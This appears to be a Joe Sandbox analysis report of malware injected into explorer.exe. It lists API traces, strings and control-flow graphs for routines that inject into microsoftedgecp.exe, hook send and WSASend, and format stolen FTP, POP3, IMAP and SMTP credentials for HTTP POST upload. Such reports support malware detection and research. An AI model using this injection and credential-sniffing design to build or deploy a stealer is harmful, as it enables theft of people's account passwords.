                                                                        control_flow_graph 113 3227728-3227745 114 322774b-3227758 113->114 115 322790d 113->115 116 322776a-322776f 114->116 115->115 117 3227771 116->117 118 3227773 117->118 119 3227760-3227765 117->119 121 3227778-322777a 118->121 120 3227766-3227768 119->120 120->116 120->117 122 3227783-3227787 121->122 123 322777c-3227781 121->123 122->121 124 3227789 122->124 123->122 125 3227794-3227799 124->125 126 322778b-3227792 124->126 127 322779b-32277a4 125->127 128 32277a8-32277aa 125->128 126->121 126->125 129 32277a6 127->129 130 322781a-322781d 127->130 131 32277b3-32277b7 128->131 132 32277ac-32277b1 128->132 129->128 133 3227822-3227825 130->133 134 32277c0-32277c2 131->134 135 32277b9-32277be 131->135 132->131 136 3227827-3227829 133->136 137 32277e4-32277f3 134->137 138 32277c4 134->138 135->134 136->133 141 322782b-322782e 136->141 139 3227804-3227811 137->139 140 32277f5-32277fc 137->140 142 32277c5-32277c7 138->142 139->139 144 3227813-3227815 139->144 140->140 143 32277fe 140->143 141->133 145 3227830-322784c 141->145 146 32277d0-32277d4 142->146 147 32277c9-32277ce 142->147 143->120 144->120 145->136 149 322784e 145->149 146->142 148 32277d6 146->148 147->146 150 32277e1 148->150 151 32277d8-32277df 148->151 152 3227854-3227858 149->152 150->137 151->142 151->150 153 322785a-3227870 LoadLibraryA 152->153 154 322789f-32278a2 152->154 155 3227871-3227876 153->155 156 32278a5-32278ac 154->156 155->152 157 3227878-322787a 155->157 158 32278d0-3227900 VirtualProtect * 2 156->158 159 32278ae-32278b0 156->159 160 3227883-3227890 GetProcAddress 157->160 161 322787c-3227882 157->161 164 3227904-3227908 158->164 162 32278b2-32278c1 159->162 163 32278c3-32278ce 159->163 165 3227892-3227897 160->165 166 3227899-322789c 160->166 161->160 162->156 163->162 164->164 167 322790a 164->167 165->155 167->115
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003226000.00000040.80000000.00040000.00000000.sdmp, Offset: 03226000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3226000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2210da374603eb32f74879ff04510a3b74123c38595040e5d607f60cc3bed7a4
                                                                        • Instruction ID: 8fcf76e48d430e6d8191a2ec0aecbd6bc3aaf8a1519aa046403532a6e1914c44
                                                                        • Opcode Fuzzy Hash: 2210da374603eb32f74879ff04510a3b74123c38595040e5d607f60cc3bed7a4
                                                                        • Instruction Fuzzy Hash: B3512B7192C7A26FD721CA7CDC806B17FA4DB42220B1D06B9C9E5CB3C7E7A45885C761
                                                                        Function 03222861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 168 3222861-3222871 GetProcessHeap RtlAllocateHeap
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 09d0ba32d4ab18af802edeb81147051f7013c5d8dd9ac664c1fbe0a66aa3fc31
                                                                        • Instruction ID: 32d6e249099b6fe673e021e90e7b0a1151774108144cfbad0d3beb5b370de456
                                                                        • Opcode Fuzzy Hash: 09d0ba32d4ab18af802edeb81147051f7013c5d8dd9ac664c1fbe0a66aa3fc31
                                                                        • Instruction Fuzzy Hash: 25A012744001007FDD50BBA0BC0DF453A19A750301F009000B389C4044996C014C8735

                                                                        Non-executed Functions

                                                                        Function 03221819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208injectionnativesleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222608: VirtualQuery.KERNEL32(03224434,?,0000001C), ref: 03222615
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7591E800,microsoftedgecp.exe,?), ref: 0322184E
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03221889
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 03221919
                                                                        • RtlMoveMemory.NTDLL(00000000,03223428,00000016), ref: 03221940
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03221968
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03221978
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03221992
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0322199A
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 032219A8
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 032219AF
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 032219C5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032219CC
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032219E2
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03221A0C
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03221A1F
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A26
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A2D
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03221A41
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03221A58
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A65
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A6B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A71
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03221A74
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: 0-vP,v$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-2027951781
                                                                        • Opcode ID: 477d4533cf7284e1b1612701b59c05313ec24beb2aa5c5e602a34583b90b01d2
                                                                        • Instruction ID: 7c32bb1a24c4a7d57d3fba2054e7dfdf92979bf400c614ce80b30b80e3384751
                                                                        • Opcode Fuzzy Hash: 477d4533cf7284e1b1612701b59c05313ec24beb2aa5c5e602a34583b90b01d2
                                                                        • Instruction Fuzzy Hash: C961AE35204315BFD320EF25AC88E6BBFECEF58650F054618FA4992240D778EA44CBA2
                                                                        Function 0322263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0322265A
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03222672
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 0322267A
                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03222685
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0322269F
                                                                        • wsprintfA.USER32 ref: 032226B6
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 032226CF
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 032226D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 920e364b8fd0885101472962ccb668493c52ad142fee47072a489e927d66d733
                                                                        • Instruction ID: 6d49a99264a5cf780e8b5f3c281ec0e737335f162fbc16e18007fc37146d8e22
                                                                        • Opcode Fuzzy Hash: 920e364b8fd0885101472962ccb668493c52ad142fee47072a489e927d66d733
                                                                        • Instruction Fuzzy Hash: 76111976A00108BFDB21EB95EC88EAEBFBCEB44741F108065F645E2154D6754E459B70
                                                                        Function 03221B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 422 3221b17-3221b2c 423 3221b60-3221b68 422->423 424 3221b2e 422->424 426 3221bc3-3221bcb 423->426 427 3221b6a-3221b6f 423->427 425 3221b30-3221b5e RtlMoveMemory 424->425 425->423 425->425 429 3221c0b 426->429 430 3221bcd-3221bdf 426->430 428 3221bbe-3221bc1 427->428 428->426 432 3221b71-3221b84 LoadLibraryA 428->432 431 3221c0d-3221c12 429->431 430->429 433 3221be1-3221bfe LdrProcessRelocationBlock 430->433 434 3221c15-3221c17 432->434 435 3221b8a-3221b8f 432->435 433->429 436 3221c00-3221c04 433->436 434->431 437 3221bb6-3221bb9 435->437 436->429 438 3221c06-3221c09 436->438 439 3221b91-3221b95 437->439 440 3221bbb 437->440 438->429 438->433 441 3221b97-3221b9a 439->441 442 3221b9c-3221b9f 439->442 440->428 443 3221ba1-3221bab GetProcAddress 441->443 442->443 443->434 444 3221bad-3221bb3 443->444 444->437
                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03221B4E
                                                                        • LoadLibraryA.KERNEL32(?,03224434,00000000,00000000,75922EE0,00000000,03221910,?,?,?,00000001,?,00000000), ref: 03221B76
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03221BA3
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03221BF4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: e9a3352b232dc01754ed49fd5898650d7b3954f92473316484ee97e3081bcc74
                                                                        • Instruction ID: 4d0f74f00511deb34d1f83876a9551cc641c9b62f210903abc32dd29c18da6fc
                                                                        • Opcode Fuzzy Hash: e9a3352b232dc01754ed49fd5898650d7b3954f92473316484ee97e3081bcc74
                                                                        • Instruction Fuzzy Hash: 0A318679710226BBC724CE29CC85B66BBA8AF15315B18456DE886C7200E775F8A5CBA0
                                                                        Function 03221332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0322109E,?,03221010), ref: 0322134A
                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0322109E,?,03221010), ref: 0322135B
                                                                        • wsprintfA.USER32 ref: 03221372
                                                                          • Part of subcall function 0322263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0322265A
                                                                          • Part of subcall function 0322263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03222672
                                                                          • Part of subcall function 0322263E: lstrlen.KERNEL32(?,00000000), ref: 0322267A
                                                                          • Part of subcall function 0322263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03222685
                                                                          • Part of subcall function 0322263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0322269F
                                                                          • Part of subcall function 0322263E: wsprintfA.USER32 ref: 032226B6
                                                                          • Part of subcall function 0322263E: CryptDestroyHash.ADVAPI32(?), ref: 032226CF
                                                                          • Part of subcall function 0322263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 032226D9
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03221389
                                                                        • GetLastError.KERNEL32 ref: 0322138F
                                                                        • Sleep.KERNEL32(000001F4), ref: 032213A1
                                                                          • Part of subcall function 032224D5: GetCurrentProcessId.KERNEL32 ref: 032224E7
                                                                          • Part of subcall function 032224D5: GetCurrentThreadId.KERNEL32 ref: 032224EF
                                                                          • Part of subcall function 032224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032224FF
                                                                          • Part of subcall function 032224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0322250D
                                                                          • Part of subcall function 032224D5: CloseHandle.KERNEL32(00000000), ref: 03222566
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 032213B8
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032213BF
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 032213E4
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032213EB
                                                                          • Part of subcall function 03221DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 03221E1D
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0322141D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                        • API String ID: 706757162-1430290102
                                                                        • Opcode ID: 814e7b4ae8de66d3c7444b5c06eb94ba296063e022bb1a84a8540e974700fa2f
                                                                        • Instruction ID: 069c0f3b5237fb91fba9661fe5576e037d72163ac89bf23f019725af925dfe25
                                                                        • Opcode Fuzzy Hash: 814e7b4ae8de66d3c7444b5c06eb94ba296063e022bb1a84a8540e974700fa2f
                                                                        • Instruction Fuzzy Hash: 77318139350324BBCB20FFA1EC0DF6E7E55AB15B01F009414FB099A594CBBA9991CBA1
                                                                        Function 03221647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 3221647-322165a 237 3221660-3221662 236->237 238 3221748-322174f 236->238 237->238 239 3221668-322166b 237->239 239->238 240 3221671-322167d lstrlen 239->240 241 3221683-322168a lstrlen 240->241 242 3221747 240->242 241->242 243 3221690-32216a8 getpeername 241->243 242->238 243->242 244 32216ae-32216ca inet_ntoa htons 243->244 244->242 245 32216cc-32216d4 244->245 246 32216d6-32216d9 245->246 247 3221708 245->247 248 32216f3-32216f8 246->248 249 32216db-32216de 246->249 250 322170d-322173c call 3222861 wsprintfA call 32224ae 247->250 248->250 251 32216e0-32216e3 249->251 252 3221701-3221706 249->252 250->242 260 322173e-3221745 call 3222843 250->260 254 32216e5-32216ea 251->254 255 32216fa-32216ff 251->255 252->250 254->248 257 32216ec-32216f1 254->257 255->250 257->242 257->248 260->242
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                        • API String ID: 3379139566-1703351401
                                                                        • Opcode ID: 6748c8daf32ec838e8c20b75544f0d50a01fa35e257f7c2e0f102e3358f00b1a
                                                                        • Instruction ID: b43876b41ce8929c593e19bdb267e25b8e6081a3ce5f7395ab1fe1c9f55e8b01
                                                                        • Opcode Fuzzy Hash: 6748c8daf32ec838e8c20b75544f0d50a01fa35e257f7c2e0f102e3358f00b1a
                                                                        • Instruction Fuzzy Hash: 7A21EA35E2072AB7DF10DEA99C48DBEBEBD9B85101B0C4175E904D3114CB75DDA08A60
                                                                        Function 03221752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 268 3221752-3221774 GetModuleHandleA GetProcAddress 269 32217c1-32217c6 268->269 270 3221776-32217c0 RtlZeroMemory * 4 268->270 270->269
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,03221539,?,?,?,0322144B,?), ref: 03221763
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0322176A
                                                                        • RtlZeroMemory.NTDLL(03224228,00000104), ref: 03221788
                                                                        • RtlZeroMemory.NTDLL(03224118,00000104), ref: 03221790
                                                                        • RtlZeroMemory.NTDLL(03224330,00000104), ref: 03221798
                                                                        • RtlZeroMemory.NTDLL(03224000,00000104), ref: 032217A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                        • API String ID: 1490332519-278825019
                                                                        • Opcode ID: e32d3112b659024e3179f29fa3738c01041425ab31507cb39e3d96bf5fe2b3bc
                                                                        • Instruction ID: 45a4aa599cca48f27216822b48bf832861b725e82a0afb1e5ef04f1192e9f1bd
                                                                        • Opcode Fuzzy Hash: e32d3112b659024e3179f29fa3738c01041425ab31507cb39e3d96bf5fe2b3bc
                                                                        • Instruction Fuzzy Hash: 0AF08926BA033C3BC120F2AB7C0AC4FBD5CC5A1DA63520251BB146750389A9798049F4
                                                                        Function 032224D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 032224E7
                                                                        • GetCurrentThreadId.KERNEL32 ref: 032224EF
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032224FF
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0322250D
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0322252C
                                                                        • SuspendThread.KERNEL32(00000000), ref: 0322253C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0322254B
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0322255B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03222566
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: fed6854004b0badc2f4a832df630f7357b109ee2cf97f355be9e90ab9a3c2016
                                                                        • Instruction ID: a032106f39d68cf88a789c8b477f668d90dc0d308b81636f8ca8185b724517e2
                                                                        • Opcode Fuzzy Hash: fed6854004b0badc2f4a832df630f7357b109ee2cf97f355be9e90ab9a3c2016
                                                                        • Instruction Fuzzy Hash: A6117C75504311FFD724EF60BC0CB6EBFA8FB95B01F048919F68192144D7398A598BB2
                                                                        Function 03221F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 282 3221f4a-3221fa5 call 32222b8 call 3222861 call 32227e2 call 3222374 291 3221fc0-3221fcc 282->291 292 3221fa7-3221fbe 282->292 295 3221fd0-3221fd2 291->295 292->295 296 32222a6-32222b5 call 3222843 295->296 297 3221fd8-322200f RtlZeroMemory 295->297 301 3222015-3222030 297->301 302 322229e-32222a5 297->302 303 3222062-3222074 301->303 304 3222032-3222043 call 32222e5 301->304 302->296 309 3222078-322207a 303->309 310 3222056 304->310 311 3222045-3222054 304->311 313 3222080-32220dc call 3222731 309->313 314 322228b-3222291 309->314 312 3222058-3222060 310->312 311->312 312->309 322 32220e2-32220e7 313->322 323 3222284 313->323 315 3222293-3222295 call 3222843 314->315 316 322229a 314->316 315->316 316->302 324 3222101-322212f call 3222861 wsprintfW 322->324 325 32220e9-32220fa 322->325 323->314 328 3222131-3222133 324->328 329 3222148-322215f 324->329 325->324 330 3222134-3222137 328->330 335 3222161-3222197 call 3222861 wsprintfW 329->335 336 322219e-32221b8 329->336 331 3222142-3222144 330->331 332 3222139-322213e 330->332 331->329 332->330 334 3222140 332->334 334->329 335->336 340 3222261-3222277 call 3222843 336->340 341 32221be-32221d1 336->341 349 3222280 340->349 350 3222279-322227b call 3222843 340->350 341->340 344 32221d7-32221ed call 3222861 341->344 351 32221ef-32221fa 344->351 349->323 350->349 353 322220e-3222225 351->353 354 32221fc-3222209 call 3222826 351->354 358 3222227 353->358 359 3222229-3222236 353->359 354->353 358->359 359->351 360 3222238-322223c 359->360 361 3222256-322225d call 3222843 360->361 362 322223e 360->362 361->340 363 322223e call 3222815 362->363 365 3222243-3222250 RtlMoveMemory 363->365 365->361
                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                          • Part of subcall function 032227E2: lstrlen.KERNEL32(032240DA,?,00000000,00000000,03221F86,75918A60,032240DA,00000000), ref: 032227EA
                                                                          • Part of subcall function 032227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,032240DA,00000001,00000000,00000000), ref: 032227FC
                                                                          • Part of subcall function 03222374: RtlZeroMemory.NTDLL(?,00000018), ref: 03222386
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 03221FE2
                                                                        • wsprintfW.USER32 ref: 0322211B
                                                                        • wsprintfW.USER32 ref: 03222186
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03222250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 1f65f9cd437e2382671c502a8f000462c1183544df76326bf08901450f60cd15
                                                                        • Instruction ID: b6472a27b7cfb9030e5bf2d9bead3f02a1a9083f47ec4880a140422eea04df7a
                                                                        • Opcode Fuzzy Hash: 1f65f9cd437e2382671c502a8f000462c1183544df76326bf08901450f60cd15
                                                                        • Instruction Fuzzy Hash: C5A19C74618315FFC360EF64DC84A2BBFE8EB88740F04492DFA85D7251DA76DA448B62
                                                                        Function 032225AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 367 32225ad-32225c9 OpenProcess 368 3222600-3222607 367->368 369 32225cb-32225da IsWow64Process 367->369 370 32225f7 369->370 371 32225dc-32225ec IsWow64Process 369->371 372 32225f9-32225fa CloseHandle 370->372 371->372 373 32225ee-32225f5 371->373 372->368 373->372
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,7591E800,?,?,microsoftedgecp.exe,03221287), ref: 032225BF
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 032225D1
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 032225E4
                                                                        • CloseHandle.KERNEL32(00000000), ref: 032225FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID: microsoftedgecp.exe
                                                                        • API String ID: 331459951-1475183003
                                                                        • Opcode ID: aa7e5bd38de0a34635ec9ef3d9d0d98df444393fd0f11de21675462534e11964
                                                                        • Instruction ID: f3ca8f1775093c987f7d4334859366dcc0b8b46a0edac2b12033237f133dfd76
                                                                        • Opcode Fuzzy Hash: aa7e5bd38de0a34635ec9ef3d9d0d98df444393fd0f11de21675462534e11964
                                                                        • Instruction Fuzzy Hash: 6DF0BB7691232DFF9B20DF90AD488FEBB6CEF01251B145259FA0092140D7354F44E6B0

                                                                        Execution Graph

                                                                        Execution Coverage:8.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:9
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 769 d29fab 770 d29fd8 769->770 772 d29ff8 769->772 773 d2a048 770->773 777 d2a04d 773->777 774 d2a190 VirtualProtect VirtualProtect 776 d2a1e8 774->776 775 d2a135 LoadLibraryA 775->777 776->776 777->774 777->775 778 d2a185 777->778 778->772

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00D218D0 1 Function_00D21D50 49 Function_00D21838 1->49 2 Function_00D21254 3 Function_00D214D4 4 Function_00D21DD4 4->49 5 Function_00D22054 5->0 8 Function_00D21F40 5->8 14 Function_00D21E70 5->14 19 Function_00D218F8 5->19 23 Function_00D21860 5->23 28 Function_00D22010 5->28 45 Function_00D2188C 5->45 5->49 50 Function_00D21938 5->50 6 Function_00D21C58 7 Function_00D2355C 7->7 12 Function_00D230F0 7->12 15 Function_00D21B70 7->15 7->49 53 Function_00D23220 7->53 8->19 8->49 9 Function_00D24A41 10 Function_00D225C4 21 Function_00D225FC 10->21 11 Function_00D2A048 38 Function_00D2A00A 11->38 12->6 12->23 40 Function_00D21A88 12->40 42 Function_00D22508 12->42 12->49 13 Function_00D22B70 35 Function_00D21A04 13->35 13->49 16 Function_00D21576 17 Function_00D22774 18 Function_00D22BF4 20 Function_00D214F9 22 Function_00D224E0 23->15 24 Function_00D21560 25 Function_00D22860 25->15 25->17 54 Function_00D22620 25->54 26 Function_00D218E8 27 Function_00D2156C 28->35 29 Function_00D22418 29->5 29->23 29->49 30 Function_00D22E98 30->4 30->13 30->18 30->35 43 Function_00D22E08 30->43 51 Function_00D22CB8 30->51 31 Function_00D24019 32 Function_00D2141D 33 Function_00D21000 34 Function_00D22E80 36 Function_00D24004 37 Function_00D21405 39 Function_00D21508 41 Function_00D21C08 42->0 42->10 42->22 43->1 43->23 43->26 43->29 44 Function_00D23088 44->15 44->30 45->49 